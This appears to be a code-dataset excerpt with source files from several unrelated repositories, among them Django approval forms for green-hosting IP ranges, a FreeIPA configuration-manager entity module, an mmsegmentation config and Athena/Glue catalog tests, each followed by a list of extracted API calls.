interrogator_autocomplete_class = InterrogationAutoComplete
class AdminPivotTableView(PivotTableView):
form_class = AdminPivotTableForm
template_name = 'admin/analytics/pivot.html'
| [((18, 22, 18, 64), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(18, 39, 18, 63): '(lambda u: u.is_superuser)'}, {}), '(lambda u: u.is_superuser)', False, 'from django.contrib.auth.decorators import user_passes_test\n')] |
heytanay/mmsegmentation | configs/pspnet/pspnet_r18-d8_512x512_80k_loveda.py | 7ddd2fe2ecff9c95999bd00ec05cc37eafb558f8 | _base_ = './pspnet_r50-d8_512x512_80k_loveda.py'
model = dict(
backbone=dict(
depth=18,
init_cfg=dict(
type='Pretrained', checkpoint='open-mmlab://resnet18_v1c')),
decode_head=dict(
in_channels=512,
channels=128,
),
auxiliary_head=dict(in_channels=256, channels=64))
| [] |
TheGenocides/BBA | bba/objects.py | 1617756ed9224027d7225ea68364f6568c56ed23 | from typing import Dict, Any
class ResponseObject:
def __init__(self, data: Dict[str, Any]):
self.payload = data
for k, v in data.items():
setattr(self, k, v) | [] |
BR0kEN-/admin-portal | apps/greencheck/forms.py | 0c38dc0d790031f45bf07660bce690e972fe2858 | from django import forms
from django.forms import ModelForm
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from .choices import ActionChoice
from .choices import StatusApproval
from .models import GreencheckIp
from .models import GreencheckIpApprove
from .models import GreencheckASN, GreencheckASNapprove
User = get_user_model()
class ApprovalMixin:
ApprovalModel = None
def _save_approval(self):
"""
Save the approval request, be it an IP Range or an AS Network
from a
"""
if self.ApprovalModel is None:
raise NotImplementedError("Approval model missing")
model_name = self.ApprovalModel._meta.model_name
if not self.cleaned_data["is_staff"]:
hosting_provider = self.instance.hostingprovider
# changed here represents an
action = ActionChoice.update if self.changed else ActionChoice.new
status = StatusApproval.update if self.changed else StatusApproval.new
kwargs = {
"action": action,
"status": status,
"hostingprovider": hosting_provider,
}
if model_name == "greencheckasnapprove":
self.instance = GreencheckASNapprove(asn=self.instance.asn, **kwargs)
else:
self.instance = GreencheckIpApprove(
ip_end=self.instance.ip_end,
ip_start=self.instance.ip_start,
**kwargs
)
hosting_provider.mark_as_pending_review(self.instance)
def clean_is_staff(self):
try:
# when using this form `is_staff` should always be available
# or else something has gone wrong...
return self.data["is_staff"]
except KeyError:
raise ValidationError("Alert staff: a bug has occurred.")
class GreencheckAsnForm(ModelForm, ApprovalMixin):
ApprovalModel = GreencheckASNapprove
is_staff = forms.BooleanField(
label="user_is_staff", required=False, widget=forms.HiddenInput()
)
class Meta:
model = GreencheckASN
fields = (
"active",
"asn",
)
def save(self, commit=True):
self._save_approval()
return super().save(commit=True)
class GreencheckIpForm(ModelForm, ApprovalMixin):
"""This form is meant for admin
If a non staff user fills in the form it would return
an unsaved approval record instead of greencheckip record
"""
ApprovalModel = GreencheckIpApprove
is_staff = forms.BooleanField(
label="user_is_staff", required=False, widget=forms.HiddenInput()
)
class Meta:
model = GreencheckIp
fields = (
"active",
"ip_start",
"ip_end",
)
def save(self, commit=True):
"""
If a non-staff user creates an ip, instead of saving
the ip record directly, it will save an approval record.
Only when it has been approved the record will actually
be created.
So we return an approval instance instead of Greencheck instance
which in turn will get saved a bit later.
"""
self._save_approval()
return super().save(commit=commit)
class GreencheckAsnApprovalForm(ModelForm):
class Meta:
model = GreencheckASNapprove
fields = ("action", "asn", "status")
def save(self, commit=True):
instance = self.instance.greencheck_asn
if commit is True:
if instance:
instance.asn = self.instance.asn
instance.save()
else:
instance = GreencheckASN.objects.create(
active=True,
asn=self.instance.asn,
hostingprovider=self.instance.hostingprovider,
)
self.instance.greencheck_asn = instance
return super().save(commit=commit)
class GreecheckIpApprovalForm(ModelForm):
field_order = ("ip_start", "ip_end")
class Meta:
model = GreencheckIpApprove
fields = "__all__"
def save(self, commit=True):
ip_instance = self.instance.greencheck_ip
if commit is True:
if ip_instance:
ip_instance.ip_end = self.instance.ip_end
ip_instance.ip_end = self.instance.ip_start
ip_instance.save()
else:
ip_instance = GreencheckIp.objects.create(
active=True,
ip_end=self.instance.ip_end,
ip_start=self.instance.ip_start,
hostingprovider=self.instance.hostingprovider,
)
self.instance.greencheck_ip = ip_instance
return super().save(commit=commit)
| [((12, 7, 12, 23), 'django.contrib.auth.get_user_model', 'get_user_model', ({}, {}), '()', False, 'from django.contrib.auth import get_user_model\n'), ((63, 54, 63, 73), 'django.forms.HiddenInput', 'forms.HiddenInput', ({}, {}), '()', False, 'from django import forms\n'), ((87, 54, 87, 73), 'django.forms.HiddenInput', 'forms.HiddenInput', ({}, {}), '()', False, 'from django import forms\n'), ((56, 18, 56, 69), 'django.core.exceptions.ValidationError', 'ValidationError', ({(56, 34, 56, 68): '"""Alert staff: a bug has occurred."""'}, {}), "('Alert staff: a bug has occurred.')", False, 'from django.core.exceptions import ValidationError\n')] |
think-wang/osroom | apps/utils/format/url_format.py | 67bb5bbd7a63fbaeb0d919738859444b54500152 | #!/usr/bin/env python
# -*-coding:utf-8-*-
from tld import get_tld
__author__ = "Allen Woo"
def get_domain(url):
'''
获取url中的全域名
:param url:
:return:
'''
res = get_tld(url, as_object=True)
return "{}.{}".format(res.subdomain, res.tld) | [((13, 10, 13, 38), 'tld.get_tld', 'get_tld', (), '', False, 'from tld import get_tld\n')] |
Tjev/freeipa-manager | ipamanager/entities.py | 0d40e64d81a86d4312b4e22cd57dcaecf25d0801 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: BSD-3-Clause
# Copyright © 2017-2019, GoodData Corporation. All rights reserved.
"""
FreeIPA Manager - entity module
Object representations of the entities configured in FreeIPA.
"""
import os
import re
import voluptuous
import yaml
from abc import ABCMeta, abstractproperty
import schemas
from command import Command
from core import FreeIPAManagerCore
from errors import ConfigError, ManagerError, IntegrityError
class FreeIPAEntity(FreeIPAManagerCore):
"""
General FreeIPA entity (user, group etc.) representation.
Can only be used via subclasses, not directly.
"""
__metaclass__ = ABCMeta
entity_id_type = 'cn' # entity name identificator in FreeIPA
key_mapping = {} # attribute name mapping between local config and FreeIPA
ignored = [] # list of ignored entities for each entity type
allowed_members = []
def __init__(self, name, data, path=None):
"""
:param str name: entity name (user login, group name etc.)
:param dict data: dictionary of entity configuration values
:param str path: path to file the entity was parsed from;
if None, indicates creation of entity from FreeIPA
"""
super(FreeIPAEntity, self).__init__()
if not data: # may be None; we want to ensure dictionary
data = dict()
self.name = name
self.path = path
self.metaparams = data.pop('metaparams', dict())
if self.path: # created from local config
try:
self.validation_schema(data)
except voluptuous.Error as e:
raise ConfigError('Error validating %s: %s' % (name, e))
if not path.endswith('.yaml'): # created from template tool
path, name = os.path.split(self.path)
self.path = '%s.yaml' % os.path.join(
path, name.replace('-', '_'))
self.data_ipa = self._convert_to_ipa(data)
self.data_repo = data
else: # created from FreeIPA
self.data_ipa = data
self.data_repo = self._convert_to_repo(data)
def _convert_to_ipa(self, data):
"""
Convert entity data to IPA format.
:param dict data: entity data in repository format
:returns: dictionary of data in IPA format
:rtype: dict
"""
result = dict()
for key, value in data.iteritems():
new_key = self.key_mapping.get(key, key).lower()
if new_key == 'memberof':
self._check_memberof(value)
result[new_key] = value
elif isinstance(value, bool):
result[new_key] = value
elif isinstance(value, list):
result[new_key] = tuple(unicode(i) for i in value)
else:
result[new_key] = (unicode(value),)
return result
def _convert_to_repo(self, data):
"""
Convert entity data to repo format.
:param dict data: entity data in IPA format
:returns: dictionary of data in repository format
:rtype: dict
"""
result = dict()
for attr in self.managed_attributes_pull:
if attr.lower() in data:
key = attr
# find reverse (IPA -> repo) attribute name mapping
for k, v in self.key_mapping.iteritems():
if v == attr:
key = k
break
value = data[attr.lower()]
if isinstance(value, tuple):
if len(value) > 1:
result[key] = list(value)
else:
result[key] = value[0]
else:
result[key] = value
return result
def _check_memberof(self, member_of):
for entity_type in member_of:
try:
self.get_entity_class(entity_type)
except KeyError:
raise ConfigError(
'Cannot be a member of non-existent entity type %s'
% entity_type)
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order
to sync entity with its FreeIPA counterpart.
:param FreeIPAEntity remote_entity: remote entity
:returns: list of Command objects to execute
:rtype: list(Command)
"""
diff = dict()
for key in self.managed_attributes_push:
local_value = self.data_ipa.get(key.lower(), ())
if not remote_entity:
if local_value:
diff[key.lower()] = local_value
else:
remote_value = remote_entity.data_ipa.get(key.lower(), ())
if sorted(local_value) != sorted(remote_value):
diff[key.lower()] = local_value
if diff or not remote_entity: # create entity even without params
if remote_entity: # modify existing entity
command = '%s_mod' % self.entity_name
else: # add new entity
command = '%s_add' % self.entity_name
return [Command(command, diff, self.name, self.entity_id_type)]
return []
def update_repo_data(self, additional):
"""
Update repo-format data with additional attributes.
Used for adding membership attributes to data.
:param dict additional: dictionary to update entity data with
:rtype: None
"""
self.data_repo.update(additional or {})
def normalize(self):
"""
Re-structure entity's data in such a way that it can be stored
into the configuration file in a normalized format. This is used
when round-trip loading and saving a configuration.
"""
memberof = self.data_repo.pop('memberOf', None)
if memberof:
for target_type, target_list in memberof.iteritems():
memberof[target_type] = sorted(target_list)
self.data_repo['memberOf'] = memberof
def write_to_file(self):
if not self.path:
raise ManagerError(
'%s has no file path, nowhere to write.' % repr(self))
if self.metaparams:
self.data_repo.update({'metaparams': self.metaparams})
# don't write default attributes into file
for key in self.default_attributes:
self.data_repo.pop(key, None)
try:
with open(self.path, 'w') as target:
data = {self.name: self.data_repo or None}
yaml.dump(data, stream=target, Dumper=EntityDumper,
default_flow_style=False, explicit_start=True)
self.lg.debug('%s written to file', repr(self))
except (IOError, OSError, yaml.YAMLError) as e:
raise ConfigError(
'Cannot write %s to %s: %s' % (repr(self), self.path, e))
def delete_file(self):
if not self.path:
raise ManagerError(
'%s has no file path, cannot delete.' % repr(self))
try:
os.unlink(self.path)
self.lg.debug('%s config file deleted', repr(self))
except OSError as e:
raise ConfigError(
'Cannot delete %s at %s: %s' % (repr(self), self.path, e))
@staticmethod
def get_entity_class(name):
for entity_class in [
FreeIPAHBACRule, FreeIPAHBACService,
FreeIPAHBACServiceGroup, FreeIPAHostGroup, FreeIPAPermission,
FreeIPAPrivilege, FreeIPARole, FreeIPAService,
FreeIPASudoRule, FreeIPAUser, FreeIPAUserGroup]:
if entity_class.entity_name == name:
return entity_class
raise KeyError(name)
@abstractproperty
def validation_schema(self):
"""
:returns: entity validation schema
:rtype: voluptuous.Schema
"""
@abstractproperty
def managed_attributes_push(self):
"""
Return a list of properties that are managed for given entity type
when pushing configuration from local repo to FreeIPA.
NOTE: the list should NOT include attributes that are managed via
separate commands, like memberOf/memberHost/memberUser or ipasudoopt.
:returns: list of entity's managed attributes
:rtype: list(str)
"""
@property
def managed_attributes_pull(self):
"""
Return a list of properties that are managed for given entity type.
when pulling configuration from FreeIPA to local repository.
:returns: list of entity's managed attributes
:rtype: list(str)
"""
return self.managed_attributes_push
@property
def default_attributes(self):
"""
Return a list of default attributes for each entity of the given type.
These attributes will not be written into the YAML file when pulling.
:returns: list of entity's attributes that have single default value
:rtype: list(str)
"""
return []
def __repr__(self):
return '%s %s' % (self.entity_name, self.name)
def __str__(self):
return self.name
def __eq__(self, other):
return type(self) is type(other) and self.name == other.name
def __ne__(self, other):
return not (self == other)
def __gt__(self, other):
return self.name > other.name
def __lt__(self, other):
return self.name < other.name
class FreeIPAGroup(FreeIPAEntity):
"""Abstract representation a FreeIPA group entity (host/user group)."""
managed_attributes_push = ['description']
@abstractproperty
def allowed_members(self):
"""
:returns: list of entity types that can be members of this entity
:rtype: list(FreeIPAEntity)
"""
class FreeIPAHostGroup(FreeIPAGroup):
"""Representation of a FreeIPA host group entity."""
entity_name = 'hostgroup'
allowed_members = ['hostgroup']
validation_schema = voluptuous.Schema(schemas.schema_hostgroups)
class FreeIPAUserGroup(FreeIPAGroup):
"""Representation of a FreeIPA user group entity."""
entity_name = 'group'
managed_attributes_pull = ['description', 'posix']
allowed_members = ['user', 'group']
validation_schema = voluptuous.Schema(schemas.schema_usergroups)
def __init__(self, name, data, path=None):
"""
:param str name: entity name (user login, group name etc.)
:param dict data: dictionary of entity configuration values
:param str path: path to file the entity was parsed from;
if None, indicates creation of entity from FreeIPA
"""
if not path: # entity created from FreeIPA, not from config
data['posix'] = u'posixgroup' in data.get(u'objectclass', [])
super(FreeIPAUserGroup, self).__init__(name, data, path)
self.posix = self.data_repo.get('posix', True)
def can_contain_users(self, pattern):
"""
Check whether the group can contain users directly.
If the pattern is None, no restrictions are applied.
:param str pattern: regex to check name by (not enforced if empty)
"""
return not pattern or re.match(pattern, self.name)
def cannot_contain_users(self, pattern):
"""
Check whether the group can not contain users directly.
Used for determining if the group can be a member of a sudo/HBAC rule.
If the pattern is None, no restrictions are applied.
:param str pattern: regex to check name by (not enforced if empty)
"""
return not pattern or not re.match(pattern, self.name)
def _process_posix_setting(self, remote_entity):
posix_diff = dict()
description = None
if remote_entity:
if self.posix and not remote_entity.posix:
posix_diff = {u'posix': True}
description = 'group_mod %s (make POSIX)' % self.name
elif not self.posix and remote_entity.posix:
posix_diff = {'setattr': (u'gidnumber=',),
'delattr': (u'objectclass=posixgroup',)}
description = 'group_mod %s (make non-POSIX)' % self.name
elif not self.posix: # creation of new non-POSIX group
posix_diff = {u'nonposix': True}
return (posix_diff, description)
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation with POSIX/non-POSIX setting.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
commands = super(FreeIPAUserGroup, self).create_commands(remote_entity)
posix_diff, description = self._process_posix_setting(remote_entity)
if posix_diff:
if not commands: # no diff but POSIX setting, new command needed
cmd = Command('group_mod', posix_diff,
self.name, self.entity_id_type)
cmd.description = description
return [cmd]
else: # update POSIX setting as part of existing command
commands[0].update(posix_diff)
return commands
class FreeIPAUser(FreeIPAEntity):
"""Representation of a FreeIPA user entity."""
entity_name = 'user'
entity_id_type = 'uid'
managed_attributes_push = ['givenName', 'sn', 'initials', 'mail',
'ou', 'manager', 'carLicense', 'title']
key_mapping = {
'emailAddress': 'mail',
'firstName': 'givenName',
'lastName': 'sn',
'organizationUnit': 'ou',
'githubLogin': 'carLicense'
}
validation_schema = voluptuous.Schema(schemas.schema_users)
class FreeIPARule(FreeIPAEntity):
"""Abstract class covering HBAC and sudo rules."""
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation
to account for adding/removing rule members.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
result = super(FreeIPARule, self).create_commands(remote_entity)
result.extend(self._process_rule_membership(remote_entity))
return result
def _process_rule_membership(self, remote_entity):
"""
Prepare a command for a hbac/sudo rule membership update.
If the rule previously had any members, these are removed
as a rule can only have one usergroup and one hostgroup as members.
:param FreeIPArule remote_entity: remote entity data (may be None)
"""
commands = []
for key, member_type, cmd_key in (
('memberhost', 'hostgroup', 'host'),
('memberuser', 'group', 'user'),
('memberservice', 'hbacsvc', 'service')):
local_members = set(self.data_ipa.get(key, []))
if remote_entity:
search_key = '%s_%s' % (key, member_type)
remote_members = set(
remote_entity.data_ipa.get(search_key, []))
else:
remote_members = set()
command = '%s_add_%s' % (self.entity_name, cmd_key)
for member in local_members - remote_members:
diff = {member_type: member}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
command = '%s_remove_%s' % (self.entity_name, cmd_key)
for member in remote_members - local_members:
diff = {member_type: member}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
return commands
class FreeIPAHBACRule(FreeIPARule):
"""Representation of a FreeIPA HBAC (host-based access control) rule."""
entity_name = 'hbacrule'
default_attributes = ['serviceCategory']
managed_attributes_push = ['description', 'serviceCategory']
validation_schema = voluptuous.Schema(schemas.schema_hbac)
def __init__(self, name, data, path=None):
"""
Create a HBAC rule instance.
This override is needed to set the servicecat parameter.
"""
if path: # only edit local entities
if not data: # may be None; we want to ensure dictionary
data = dict()
if 'memberService' not in data:
data.update({'serviceCategory': 'all'})
elif 'serviceCategory' in data:
raise IntegrityError(
'%s cannot contain both memberService and serviceCategory'
% name)
super(FreeIPAHBACRule, self).__init__(name, data, path)
class FreeIPASudoRule(FreeIPARule):
"""Representation of a FreeIPA sudo rule."""
entity_name = 'sudorule'
default_attributes = [
'cmdCategory', 'options', 'runAsGroupCategory', 'runAsUserCategory']
managed_attributes_push = [
'cmdCategory', 'description',
'ipaSudoRunAsGroupCategory', 'ipaSudoRunAsUserCategory']
managed_attributes_pull = managed_attributes_push + ['ipaSudoOpt']
key_mapping = {
'options': 'ipaSudoOpt',
'runAsGroupCategory': 'ipaSudoRunAsGroupCategory',
'runAsUserCategory': 'ipaSudoRunAsUserCategory'
}
validation_schema = voluptuous.Schema(schemas.schema_sudo)
def __init__(self, name, data, path=None):
"""
Create a sudorule instance.
This override is needed to set the options & runAs params.
"""
if path: # only edit local entities
if not data: # may be None; we want to ensure dictionary
data = dict()
data.update({'options': ['!authenticate', '!requiretty'],
'cmdCategory': 'all',
'runAsUserCategory': 'all',
'runAsGroupCategory': 'all'})
super(FreeIPASudoRule, self).__init__(name, data, path)
def _convert_to_repo(self, data):
result = super(FreeIPASudoRule, self)._convert_to_repo(data)
if isinstance(result.get('options'), unicode):
result['options'] = [result['options']]
return result
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation with sudorule option update.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
result = super(FreeIPASudoRule, self).create_commands(remote_entity)
result.extend(self._parse_sudo_options(remote_entity))
return result
def _parse_sudo_options(self, remote_entity):
"""
Prepare commands for sudo rule options update. This includes
deletion of old options that are no longer in configuration
as well as addition of new options.
:param dict remote_entity: remote entity data (can be None)
:returns: list of sudorule option update commands to execute
:rtype: list(Command)
"""
commands = []
local_options = set(self.data_repo.get('options', []))
if remote_entity:
remote_options = set(remote_entity.data_ipa.get('ipasudoopt', []))
else:
remote_options = set()
command = 'sudorule_add_option'
for opt in local_options - remote_options:
diff = {'ipasudoopt': [opt]}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
command = 'sudorule_remove_option'
for opt in remote_options - local_options:
diff = {'ipasudoopt': [opt]}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
return commands
class FreeIPAHBACService(FreeIPAEntity):
"""Entity to hold the info about FreeIPA HBACServices"""
entity_name = 'hbacsvc'
managed_attributes_push = ['description']
managed_attributes_pull = managed_attributes_push
validation_schema = voluptuous.Schema(schemas.schema_hbacservices)
class FreeIPAHBACServiceGroup(FreeIPAEntity):
"""Entity to hold the info about FreeIPA HBACServiceGroups"""
entity_name = 'hbacsvcgroup'
managed_attributes_push = ['description']
managed_attributes_pull = managed_attributes_push
allowed_members = ['hbacsvc']
validation_schema = voluptuous.Schema(schemas.schema_hbacsvcgroups)
class FreeIPARole(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Roles"""
entity_name = 'role'
managed_attributes_pull = ['description']
managed_attributes_push = managed_attributes_pull
allowed_members = ['user', 'group', 'service', 'hostgroup']
validation_schema = voluptuous.Schema(schemas.schema_roles)
class FreeIPAPrivilege(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Privilege"""
entity_name = 'privilege'
managed_attributes_pull = ['description']
managed_attributes_push = managed_attributes_pull
allowed_members = ['role']
validation_schema = voluptuous.Schema(schemas.schema_privileges)
class FreeIPAPermission(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Permission"""
entity_name = 'permission'
managed_attributes_pull = ['description', 'subtree', 'attrs',
'ipapermlocation', 'ipapermright',
'ipapermdefaultattr']
managed_attributes_push = managed_attributes_pull
key_mapping = {
'grantedRights': 'ipapermright',
'attributes': 'attrs',
'location': 'ipapermlocation',
'defaultAttr': 'ipapermdefaultattr'
}
allowed_members = ['privilege']
validation_schema = voluptuous.Schema(schemas.schema_permissions)
class FreeIPAService(FreeIPAEntity):
"""
Entity to hold the info about FreeIPA Services
PUSH NOT SUPPORTED yet
"""
entity_name = 'service'
entity_id_type = 'krbcanonicalname'
managed_attributes_push = [] # Empty because we don't support push
managed_attributes_pull = ['managedby_host', 'description']
key_mapping = {
'managedBy': 'managedby_host',
}
validation_schema = voluptuous.Schema(schemas.schema_services)
def write_to_file(self):
"""
Converts the file name format from xyz/hostname.int.na.intgdc.com
to xyz-hostname_int_na_intgdc_com.yaml
"""
path, file_name = os.path.split(self.path)
service_name, _ = file_name.split('@')
self.path = ('%s-%s.yaml' % (path, service_name.replace('.', '_')))
super(FreeIPAService, self).write_to_file()
class EntityDumper(yaml.SafeDumper):
"""YAML dumper subclass used to fix under-indent of lists when dumping."""
def __init__(self, *args, **kwargs):
super(EntityDumper, self).__init__(*args, **kwargs)
self.add_representer(type(None), self._none_representer())
def increase_indent(self, flow=False, indentless=False):
return super(EntityDumper, self).increase_indent(flow, False)
def _none_representer(self):
"""
Enable correct representation of empty values in config
by representing None as empty string instead of 'null'.
"""
def representer(dumper, value):
return dumper.represent_scalar(u'tag:yaml.org,2002:null', '')
return representer
| [((279, 24, 279, 68), 'voluptuous.Schema', 'voluptuous.Schema', ({(279, 42, 279, 67): 'schemas.schema_hostgroups'}, {}), '(schemas.schema_hostgroups)', False, 'import voluptuous\n'), ((287, 24, 287, 68), 'voluptuous.Schema', 'voluptuous.Schema', ({(287, 42, 287, 67): 'schemas.schema_usergroups'}, {}), '(schemas.schema_usergroups)', False, 'import voluptuous\n'), ((367, 24, 367, 63), 'voluptuous.Schema', 'voluptuous.Schema', ({(367, 42, 367, 62): 'schemas.schema_users'}, {}), '(schemas.schema_users)', False, 'import voluptuous\n'), ((423, 24, 423, 62), 'voluptuous.Schema', 'voluptuous.Schema', ({(423, 42, 423, 61): 'schemas.schema_hbac'}, {}), '(schemas.schema_hbac)', False, 'import voluptuous\n'), ((456, 24, 456, 62), 'voluptuous.Schema', 'voluptuous.Schema', ({(456, 42, 456, 61): 'schemas.schema_sudo'}, {}), '(schemas.schema_sudo)', False, 'import voluptuous\n'), ((523, 24, 523, 70), 'voluptuous.Schema', 'voluptuous.Schema', ({(523, 42, 523, 69): 'schemas.schema_hbacservices'}, {}), '(schemas.schema_hbacservices)', False, 'import voluptuous\n'), ((532, 24, 532, 71), 'voluptuous.Schema', 'voluptuous.Schema', ({(532, 42, 532, 70): 'schemas.schema_hbacsvcgroups'}, {}), '(schemas.schema_hbacsvcgroups)', False, 'import voluptuous\n'), ((541, 24, 541, 63), 'voluptuous.Schema', 'voluptuous.Schema', ({(541, 42, 541, 62): 'schemas.schema_roles'}, {}), '(schemas.schema_roles)', False, 'import voluptuous\n'), ((550, 24, 550, 68), 'voluptuous.Schema', 'voluptuous.Schema', ({(550, 42, 550, 67): 'schemas.schema_privileges'}, {}), '(schemas.schema_privileges)', False, 'import voluptuous\n'), ((567, 24, 567, 69), 'voluptuous.Schema', 'voluptuous.Schema', ({(567, 42, 567, 68): 'schemas.schema_permissions'}, {}), '(schemas.schema_permissions)', False, 'import voluptuous\n'), ((582, 24, 582, 66), 'voluptuous.Schema', 'voluptuous.Schema', ({(582, 42, 582, 65): 'schemas.schema_services'}, {}), '(schemas.schema_services)', False, 'import voluptuous\n'), ((589, 26, 589, 50), 'os.path.split', 'os.path.split', ({(589, 40, 589, 49): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((189, 12, 189, 32), 'os.unlink', 'os.unlink', ({(189, 22, 189, 31): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((307, 30, 307, 58), 're.match', 're.match', ({(307, 39, 307, 46): 'pattern', (307, 48, 307, 57): 'self.name'}, {}), '(pattern, self.name)', False, 'import re\n'), ((53, 29, 53, 53), 'os.path.split', 'os.path.split', ({(53, 43, 53, 52): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((141, 20, 141, 74), 'command.Command', 'Command', ({(141, 28, 141, 35): 'command', (141, 37, 141, 41): 'diff', (141, 43, 141, 52): 'self.name', (141, 54, 141, 73): 'self.entity_id_type'}, {}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((177, 16, 178, 72), 'yaml.dump', 'yaml.dump', (), '', False, 'import yaml\n'), ((316, 34, 316, 62), 're.match', 're.match', ({(316, 43, 316, 50): 'pattern', (316, 52, 316, 61): 'self.name'}, {}), '(pattern, self.name)', False, 'import re\n'), ((345, 22, 346, 61), 'command.Command', 'Command', ({(345, 30, 345, 41): '"""group_mod"""', (345, 43, 345, 53): 'posix_diff', (346, 30, 346, 39): 'self.name', (346, 41, 346, 60): 'self.entity_id_type'}, {}), "('group_mod', posix_diff, self.name, self.entity_id_type)", False, 'from command import Command\n'), ((509, 16, 509, 70), 'command.Command', 'Command', ({(509, 24, 509, 31): 'command', (509, 33, 509, 37): 'diff', (509, 39, 509, 48): 'self.name', (509, 50, 509, 69): 'self.entity_id_type'}, {}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((514, 16, 514, 70), 'command.Command', 'Command', ({(514, 24, 514, 31): 'command', (514, 33, 514, 37): 'diff', (514, 39, 514, 48): 'self.name', (514, 50, 514, 69): 'self.entity_id_type'}, {}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((51, 22, 51, 72), 'errors.ConfigError', 'ConfigError', ({(51, 34, 51, 71): "('Error validating %s: %s' % (name, e))"}, {}), "('Error validating %s: %s' % (name, e))", False, 'from errors import ConfigError, ManagerError, IntegrityError\n'), ((114, 22, 116, 34), 'errors.ConfigError', 'ConfigError', ({(115, 20, 116, 33): "('Cannot be a member of non-existent entity type %s' % entity_type)"}, {}), "('Cannot be a member of non-existent entity type %s' % entity_type)", False, 'from errors import ConfigError, ManagerError, IntegrityError\n'), ((409, 20, 409, 74), 'command.Command', 'Command', ({(409, 28, 409, 35): 'command', (409, 37, 409, 41): 'diff', (409, 43, 409, 52): 'self.name', (409, 54, 409, 73): 'self.entity_id_type'}, {}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((414, 20, 414, 74), 'command.Command', 'Command', ({(414, 28, 414, 35): 'command', (414, 37, 414, 41): 'diff', (414, 43, 414, 52): 'self.name', (414, 54, 414, 73): 'self.entity_id_type'}, {}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((436, 22, 438, 27), 'errors.IntegrityError', 'IntegrityError', ({(437, 20, 438, 26): "('%s cannot contain both memberService and serviceCategory' % name)"}, {}), "('%s cannot contain both memberService and serviceCategory' %\n name)", False, 'from errors import ConfigError, ManagerError, IntegrityError\n')] |
weknowtraining/athena-glue-service-logs | test/test_catalog_manager.py | b7cf77408486f2bfa941b8609617ed47aa3e2d02 | # pylint: skip-file
from athena_glue_service_logs.catalog_manager import BaseCatalogManager
def test_class_init(mocker):
mocker.patch.multiple(BaseCatalogManager, __abstractmethods__=set())
base_catalog = BaseCatalogManager('us-west-2', 'dbname', 'tablename', 's3://somewhere')
assert base_catalog.database_name == 'dbname'
assert base_catalog.s3_location == 's3://somewhere'
assert base_catalog.table_name == 'tablename'
def test_init_with_partitions(mocker):
mocker.patch.multiple(BaseCatalogManager, __abstractmethods__=set())
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.does_database_exist', return_value=True)
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_database')
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_table')
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_partitions')
base_catalog = BaseCatalogManager('us-west-2', 'dbname', 'tablename', 's3://somewhere')
base_catalog.initialize_with_partitions(['a', 'b', 'c'])
assert BaseCatalogManager.create_database.call_count == 0
BaseCatalogManager.create_table.assert_called_once()
BaseCatalogManager.create_partitions.assert_called_once_with(partition_list=['a', 'b', 'c'])
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.does_database_exist', return_value=False)
base_catalog.initialize_with_partitions(['a', 'b', 'c'])
assert BaseCatalogManager.create_database.call_count == 1
| [((8, 19, 8, 91), 'athena_glue_service_logs.catalog_manager.BaseCatalogManager', 'BaseCatalogManager', ({(8, 38, 8, 49): '"""us-west-2"""', (8, 51, 8, 59): '"""dbname"""', (8, 61, 8, 72): '"""tablename"""', (8, 74, 8, 90): '"""s3://somewhere"""'}, {}), "('us-west-2', 'dbname', 'tablename', 's3://somewhere')", False, 'from athena_glue_service_logs.catalog_manager import BaseCatalogManager\n'), ((21, 19, 21, 91), 'athena_glue_service_logs.catalog_manager.BaseCatalogManager', 'BaseCatalogManager', ({(21, 38, 21, 49): '"""us-west-2"""', (21, 51, 21, 59): '"""dbname"""', (21, 61, 21, 72): '"""tablename"""', (21, 74, 21, 90): '"""s3://somewhere"""'}, {}), "('us-west-2', 'dbname', 'tablename', 's3://somewhere')", False, 'from athena_glue_service_logs.catalog_manager import BaseCatalogManager\n'), ((25, 4, 25, 56), 'athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_table.assert_called_once', 'BaseCatalogManager.create_table.assert_called_once', ({}, {}), '()', False, 'from athena_glue_service_logs.catalog_manager import BaseCatalogManager\n'), ((26, 4, 26, 96), 'athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_partitions.assert_called_once_with', 'BaseCatalogManager.create_partitions.assert_called_once_with', (), '', False, 'from athena_glue_service_logs.catalog_manager import BaseCatalogManager\n')] |
fiddlerwoaroof/sandbox | unsorted/pythonsnippets_0013.py | 652acaf710a8b60f005769bde317e7bbf548cc2b | from twisted.internet import reactor
reactor.listenTCP(8789, factory)
